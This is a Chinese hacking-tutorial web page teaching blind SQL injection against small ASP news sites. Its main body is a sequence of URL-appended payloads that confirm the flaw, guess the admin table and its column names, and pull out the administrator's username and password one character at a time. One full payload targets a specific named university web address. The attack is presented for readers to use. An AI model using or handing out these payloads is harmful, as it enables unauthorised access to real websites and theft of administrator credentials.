首页 电脑学院 黑客教程 网站技术 网页特效 免费论文 公文写作 演讲发言 实用文档 职场指南 时尚生活 情感男女 其他资讯

您的位置:首页-> 黑客教程-> 入侵实例-> 学习SQL注射最容易简洁的方法
学习SQL注射最容易简洁的方法
一般国内的小一点的新闻站点程序 都有 ""&request 这种漏洞,下面我讲解攻击方法  
在地址栏:  

and 1=1  

查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误,继续假设这个站的数据库存在一个admin表  
在地址栏:  
and 0<>(select count(*) from admin)  

返回页正常,假设成立了。  

下面来猜猜看一下管理员表里面有几个管理员ID:  

and 1<(select count(*) from admin)  

页面什么都没有。管理员的数量等于或者小于1个  

and 1=(select count(*) from admin)  

输入=1没显示错误,说明此站点只有一个管理员。  

下面就是要继续猜测admin 里面关于管理员用户名和密码的字段名称。  

and 1=(select count(*) from admin where len(username)>0)  

猜解错误!不存在 username 这个字段。只要一直改变括号里面的username这个字?下面给大家几个常用的  
user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu  


用户名称字段猜解完成之后继续猜解密码字段  
and 1=(select count(*) from admin where len(password)>0)  

password 字段存在!因为密码字段一般都是这个拉,如果不是就试试pass如果还不是就自己想想吧  

我们已经知道了管理员表里面有3个字段 id,user,password。  
id 编号  
user 用户名  
password 密码  
下面继续的就是管理员用户名和密码的猜解了。一个一个来,有点麻烦,最好找个猜解机来  

先猜出长度!  

and 1=(select count(*) from admin where len(user)<10)  

user 字段长度小于10  

and 1=(select count(*) from admin where len(user)<5)  

user 字段长度不小于5  

慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确  
and 1=(select count(*) from admin where len(user)=6)  

下面猜密码,  
and 1=(select count(*) from admin where len(password)=10)  

猜出来密码10位,不要奇怪,现在网管都有防备的,所以密码上20位也不太奇怪了  


下面该做的就是把他们拆开来一个一个猜字母  
and 1=(select count(*) from admin where left(user,1)=a)  
返回正常,第一位字母等于a,千万不要把大写和小写给搞错了哦~~呵呵,如果不a就继续猜其他的字符落,反正猜到返回正常就算OK了  

开始猜解帐号的第二位字符。  

and 1=(select count(*) from admin where left(user,2)=ad)  

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了  

工作还没有完,别忙着跑了,还有10位密码,呵呵  

and 1=(select count(*) from admin where left(password,1)=a)  

经过无数次错误之后......  
http://xyz.hytc.edu.cn/new2/article_view.asp?id=2499 and 1=(select count(*) from admin where left(password,10)=administra)  

结果密码是administra  
看完文章,大家不要照着我的文章做,网络上的东西是变幻无穷的,但是我相信大家的大脑肯定比他变得快,所以希望大家看了这个文章灵活运用!那样才能达到理想的效果
在百度中查找更多学习SQL注射最容易简洁的方法的内容
职场宝典   职场故事   职场跳槽   职场文化   职场理财   职场充电   情感天地   职场女性   职场礼仪   职场新人
报告总结   述职报告 工作总结 调查报告 工作汇报 计划方案 个人总结 社会实践 规章制度 调研报告 
  实习报告 考察报告 辞职报告 
演讲发言   竞职演说   就职演说   精彩演说   爱国演讲   英语演讲   十七大演讲   安全生产演讲稿   
节日祝福   重阳节 国庆节 教师节 中秋节 情人节 七夕节 劳动节 妇女节 清明节 愚人节 春节 元旦 圣诞节  儿童节  端午节 母亲节 新婚祝福 生日祝福 
讲话致辞   开业开幕   会议主持   庆典致辞   会议发言   党风廉政   党政报告   贺电慰问   婚丧嫁娶   思想宣传
法律常识   基本常识   法律文书   权益常识   劳动保障   婚姻继承   民事诉讼   刑事诉讼   
党建材料   入党申请   思想学习   党性分析   思想汇报   转正申请   民主生活   党委党建   入团申请   申报材料
求职简历   个人简历   求职自荐   求职谋略   面试技巧   求职英语   自我鉴定   英文简历   简历封面
心得体会   心得体会   经验交流   读后感   
时政热点   和谐社会   先进性教育   新农村建设   十七大   八荣八耻   科学发展观   劳动合同法   
人际沟通   社交技巧   社交礼仪   口才技巧   谈话技巧   演讲技巧   
营销技巧   电话销售   网络销售   推销技巧   促销技巧   销售口才   营销手段   销售技巧   谈判技巧   

“ 学习SQL注射最容易简洁的方法”来源于网络,版权归作者所有!勿用于商业用途。

入侵实例

新手入门
病毒漏洞
工具使用
入侵实例
安全防范
旁门左道

本类阅读TOP10

·我是怎么进入他人计算机的
·关于共享机器的入侵过程
·黑客是怎样攻击服务器的
·黑客攻击过程
·一次侵入NT的故事
·一种奇特的入侵方式
·如何ping死win98
·通过NetBIOS入侵
·多姿多彩的网站挂马方式
·一次512端口入侵

广告


关于本站|服务条款|广告服务|客服中心|发布文章|网站留言